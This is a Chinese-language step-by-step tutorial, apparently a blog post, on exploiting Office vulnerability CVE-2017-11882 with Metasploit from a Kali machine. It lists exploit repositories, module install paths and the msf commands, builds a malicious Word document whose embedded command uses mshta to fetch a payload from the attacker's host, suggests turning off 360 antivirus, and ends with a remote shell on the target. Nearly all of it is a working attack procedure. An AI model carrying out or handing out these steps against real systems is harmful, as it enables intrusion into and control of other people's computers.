office漏洞 CVE-2017-11882 msf利用
目标机:一台安装好office漏洞版本的电脑
攻击机:一台kai liunx ip:192.168.0.110
python脚本下载链接:https://github.com/Ridter/CVE-2017-11882
msf组件下载:https://github.com/0x09AL/CVE-2017-11882-metasploit
一.把上面下载的cve_2017_11882.rb文件复制到/usr/share/metasploit-framework/modules/exploits/windows/smb/目录下
二.把下载的cve_2017_11882.rtf放到/usr/share/metasploit-framework/data/exploits/
要是不放这个文件可能后面执行exploit时会出现运行失败
三.骚操作开始了,打开神器metasploit
四.使用命令search cve_2017_11882 查找对应的模块
五.使用命令use exploit/windows/smb/cve_2017_11882设置payload为反弹top
六.使用命令set lhost 192.168.0.110(攻击机的ip)
七.使用命令set URIPATH test设置URI的路径(注意这里设置的路径test,下面使用python脚本生成doc的时候也要加上这个路径)
八.检查配置,show options
九.运行,exploit -j
十.另外打开一个终端,把Command109b_CVE-2017-11882.py复制到kai liunx桌面,cd到桌面,运行命令python Command109b_CVE-2017-11882.py -c "mshta http://192.168.0.110:8080/test" -o test4.doc 生成恶意doc文件
注意要加上端口8080,加上上面设置的URI路径
十一.复制文件到目标机打开
360可能会杀掉最好关了
十二.返回攻击机kai liunx,看到鱼儿已经上钩了
十三.使用命令sessions -i进行查看
十四.输出命令sessions -i 1,切换进入
十五.现在我们成功的获取了目标机,输入shell,进入我们熟悉的cmd界面,并使用一下cmd命令。
感谢各位大佬赏脸,有什么不足的地方请多多指教,欢迎意见轰炸,谢谢!!!